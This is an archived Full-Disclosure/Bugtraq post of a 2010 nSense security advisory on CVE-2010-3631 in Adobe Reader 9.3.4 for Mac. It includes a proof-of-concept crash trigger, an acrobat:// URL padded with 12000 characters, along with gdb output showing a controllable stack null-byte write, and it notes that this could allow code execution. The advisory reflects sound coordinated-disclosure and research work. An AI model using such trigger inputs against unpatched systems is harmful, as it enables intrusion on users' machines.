lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTimBQQp49Pew=-OeaVvJPm2eUG+GC=op7cQfuPRx@mail.gmail.com>
Date: Wed, 6 Oct 2010 12:24:59 +0300
From: Henri Lindberg <henri@...nse.fi>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: nSense-2010-001: Adobe Reader for Macintosh

       nSense Vulnerability Research Security Advisory NSENSE-2010-001
       ---------------------------------------------------------------

       Affected Vendor:    Adobe
       Affected Product:   Adobe Reader 9.3.4 for Macintosh
       Platform:           OS X
       Impact:             User assisted code execution
       Vendor response:    Patch
       Credit:             Knud / nSense

       Technical details
       ---------------------------------------------------------------

       terminal 1:
       $ gdb --waitfor=AdobeReader

       terminal 2:
       $ open acrobat://`perl -e 'print "A" x 12000'`

       terminal 1:
       (gdb) cont
       [snip]
       Program received signal EXC_BAD_ACCESS, Could not access memory.
       Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2
       0x7ffa0d6a in AcroBundleThreadQuitProc ()
       (gdb) set disassembly-flavor intel
       (gdb) x/i $pc
       0x7ffa0d6a <AcroBundleThreadQuitProc+2608>:     mov    BYTE PTR
       [ebp+eax-0x420],0x0
       (gdb) i r ebp eax
       ebp            0xbfffe908       0xbfffe908
       eax            0x2eea   12010
       (gdb)

       As can be seen from the above, we control the value in eax (in
       this case 12010, the length of the acrobat:// + the 12000 A's).

       This allows us to write the null byte anywhere in memory between
       ebp-0x420 (0xBFFFE4E8) and the end of the stack.

       The behaviour may be leveraged to modify the frame pointer,
       changing the execution flow and thus permitting arbitrary code
       execution in the context of the user running the program.

       Timeline:
       Aug 10th		Contacted vendor PSIRT
       Aug 10th         Vendor response. Vulnerability reproduced.
       Aug 16th         Status update request sent to vendor
       Aug 17th         Vendor response, still investigating
       Sep 2nd          Status update request sent to vendor
       Sep 3rd          Vendor response. Working on fix
       Sep 22nd         Contacted vendor regarding patch date
       Sep 22nd         Vendor response. Confirmed patch date.
       Sep 23rd         Corrected researcher name
       Oct 1st          Vendor sent CVE identifier CVE-2010-3631
       Oct 5th          Vendor releases the patch
       Oct 6th          Advisory published

       http://www.nsense.fi                       http://www.nsense.dk



       $$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
       $$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
       $$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
       $$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
       $$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P

                      D r i v e n   b y   t h e   c h a l l e n g e _

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ